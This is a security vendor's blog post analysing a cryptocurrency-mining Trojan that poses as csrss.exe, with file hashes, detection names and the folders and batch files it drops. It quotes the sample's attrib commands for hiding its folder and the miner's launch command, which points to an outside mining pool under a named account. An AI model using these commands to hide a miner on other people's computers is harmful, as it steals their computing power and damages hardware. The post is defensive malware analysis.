June 21, 2017 / by / 1 Comment

1 Star2 Stars3 Stars4 Stars5 Stars (71 votes, average: 5.00 out of 5)
loadingLoading...

What is Trojan.CoinMiner csrss.exe

Trojan.CoinMiner uses the computing resources of the infected computer to receive crypto currency, most often in BitCoin.

The owner of such infected computers may notice that some processes in their system use a lot of CPU % what often slow down the computer or even freeze it completely. The main problem with a miner program that they use your PC to make money.

Small overheat you say?

Small overheat you say?

For the average user it can be just a slow down of the computer but be careful, it you ignore this problem you can lose part of your PC because overheating. So if you notice that CPU temperatures over 50 degrees, then be ready that someone already using your PC for mining.

srvanyx.exe

Such viruses often can be downloaded from the Internet by the users themselves, often when user open unknown files from the spam message he infect the computer with different kind of virus like malware or adware. But the developer often has a plan B, they attach alike viruses to the installation of different free programs, so if you skip the installation process and didn’t look to advantage setting then ready that your computer will be infected with virus like this.

We discovered a sample of Trojan.CoinMiner written in Delphi, which is distributed via spam mail:

Trojan Coin Miner PEiD v0.95

GridinSoft Antim-Malware detect it as “Trojan.Win32.CoinMiner.dd” (like on image below):
Trojan.Win32.CoinMiner.dd

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Other antivirus programs detect Trojan.CoinMiner (csrss.exe) as:

AntivirusResult
DrWebTrojan.Hosts.6838
EmsisoftTrojan.Agent.CEQQ (B)
ESET-NOD32a variant of Win64/BitCoinMiner.AP potentially unsafe
Kasperskynot-a-virus:RiskTool.Win64.BitCoinMiner.cev

The virus creates the next folder:

C:\Windows\MicrosoftU

And create these files:

  • Auto.bat
  • Start.vbs
  • Start2.vbs
  • Hide.bat
  • Start.bat
  • Start2.bat
  • 1.bat
  • 2.bat
  • Srvany.exe
  • Csrss.exe
  • Srvanyx.exe

After Trojan.CoinMiner has been unpacked, it hides its presence using the strings in Hide.bat, setting the hidden and system attributes to the folder and files in it.
Attrib C:\Windows\MicrosoftU + S + H / S / D
Attrib C:\Windows\MicrosoftU\*. * + S + H / S / D

“Miner” uses the name of one of the system files “csrss.exe” to hide its presence in the system.

The virus starts with the following parameters:
Stratum + tcp: //xmr.pool.minergate.com: 45560 – Resource for which “mining” will be entered
Tatyana.kostomarova@gmail.com – user login from whom the extraction will be introduced
Cryptonight – Mining algorithm

Another parameter is how many threads the program will work in, this “miner” has a formula for calculating the number of processor cores involved, it is in the .bat file that launches the “miner” for the first time:

Set / a cpu =% NUMBER_OF_PROCESSORS% / 2 + 1
Srvanyx -a cryptonight -o stratum + tcp: //xmr.pool.minergate.com: 45560 -u tatyana.kostomarova@gmail.com -p x -t% cpu%

tadjukbm Trojan.CoinMiner

Nah, it’s fine, the computer just a slily slow down

Another good miner example – Adylkuzz. This miner use SMB vulnerability for several weeks and this is similar vulnerability what uses widespread WannaCry (Wana Decrypt0r) what infect million of computer last week. The main differences between those two viruses is that Adylkuzz miner hide himself as deep as possible and just use computer performance to mine Bitcoin and WCry (Wana Decryptor) aggressively encrypt data on the user’s computer.
msiexec.exe
Moreover, the researchers are sure that the malicious Adylkuzz miner infect computer much earlier than WannaCry, at least on May 2, 2017. Adylkuzz did not attract as much attention as the sWana Decrypt0r, for the simple reason that it is much more difficult to notice infection in this case. The only “symptoms” that the victim can notice is the slowdown of the PC, as the miner use the system’s resources. Specialists say that Adylkuzz protected the users affected by it from WannaCry ransomware attacks. After the miner infect user’s computer, it closes the “hole” in SMB and does not allow other malawre to use the gap.
Trojan Coin Miner REMOVAL
The specialists of both companies remind everyone who for some reason has not yet installed the update MS17-010, which closes the gap in SMB, that it should be done immediately, and also close the 445 port.

The miners is worth noting that the program that is used only for “mining” and does not carry a direct threat, but can be used for undesirable actions. We highly recommend you to download and scan your PC with professional anti-malware tool and clean up your PC.

Related Post

How to protect your PC from a virus, that has infe... I think you've already heard about this virus. For the past few days, it spread to computers in 74 counties! The biggest impact we can see is in China...
Coin Miners – What is it? How to know that ... Cryptocurrencies are fast becoming popular after the launch of the first of its kind in 2009. The new era mode of payment that is organized by a block...

1 comment on “What is Trojan.CoinMiner csrss.exe”

Leave a Reply

Your email address will not be published. Required fields are marked *

Gridinsoft Products mini-guide

Recent Posts

Gridinsoft Anti-Malware

Top Tips

Be mindful and keep your PC healthy -- GridinSoft.com

Follow Us

GridinSoft Official Offers, Coupons and FREE proposals

Related Post